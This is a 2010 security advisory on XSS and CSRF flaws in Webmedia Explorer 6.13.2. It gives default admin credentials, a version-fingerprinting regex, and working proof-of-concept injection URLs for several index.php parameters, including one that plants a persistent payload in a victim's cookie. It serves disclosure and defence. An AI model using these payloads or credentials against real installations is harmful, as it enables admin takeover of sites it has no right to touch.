Webmedia Explorer 6.13.2 multiple security vulnerabilities

There are multiple Cross-Site Scripting (XSS) and Cross-Site Request Forgery (CSRF) vulnerabilities in Webmedia Explorer 6.13.2 which may allow an attacker to take control of the software if a user with admin privileges browses a malicious page.

Software

Software Link: Webmedia Explorer 6.13.2

Vulnerable Version: <= 6.13.2

Default Credentials: Admin/changeme

Vendor Notification: marc.salmurri@gmail.com at 2010-11-05 12:22AM

# No reply from vendor by 2010-11-13 # Advisory released.

Fingerprint

A WhatWeb plugin for Webmedia Explorer is available.

# 51 Google results for "Powered by webmedia explorer" "Marc Salmurri"

# Version Detection: Powered by <a href="http:\/\/www.webmediaexplorer.com[^>]*>webmedia explorer ([\d\.]+)<\/a>

Vulnerabilities

# Cross-Site Scripting (XSS) # <= 6.13.2 # Unpatched

The "tag", "dir", "action" and "image" parameters of "/index.php" are vulnerable to Cross-Site Scripting (XSS) :

http://demo.webmediaexplorer.com/index.php?tag="><script>alert(1)</script>
http://demo.webmediaexplorer.com/index.php?dir[]="><script>alert(1)</script>
http://demo.webmediaexplorer.com/index.php?dir["><script>alert(1)</script>]=
http://demo.webmediaexplorer.com/index.php?action["><script>alert(1)</script>]=
http://demo.webmediaexplorer.com/index.php?action[]="><script>alert(1)</script>
http://demo.webmediaexplorer.com/index.php?image="></iframe><script>alert(1)</script><"

The "background" and "theme" parameters of "/index.php" are vulnerable to Cross-Site Scripting (XSS) :

http://demo.webmediaexplorer.com/index.php?action=config&background=1</script><script>alert(1)</script>&theme=1</script><script>alert(2)</script>

# Cross-Site Request Forgery (CSRF) # <= 6.13.2 # Unpatched

This URL will add a JavaScript XSS payload to the user's cookie on demo.webmediaexplorer.com which is then executed for every page the victim visit's on demo.webmediaexplorer.com.

http://demo.webmediaexplorer.com/index.php?action=config&background=1</script><script>alert(1)</script>&theme=1</script><script>alert(2)</script>

Reference

# OWASP: Cross-Site Scripting (XSS)

# OWASP: Cross-Site Request Forgery

Appendix

[TXT] Webmedia Explorer 6.13.2 multiple security vulnerabilities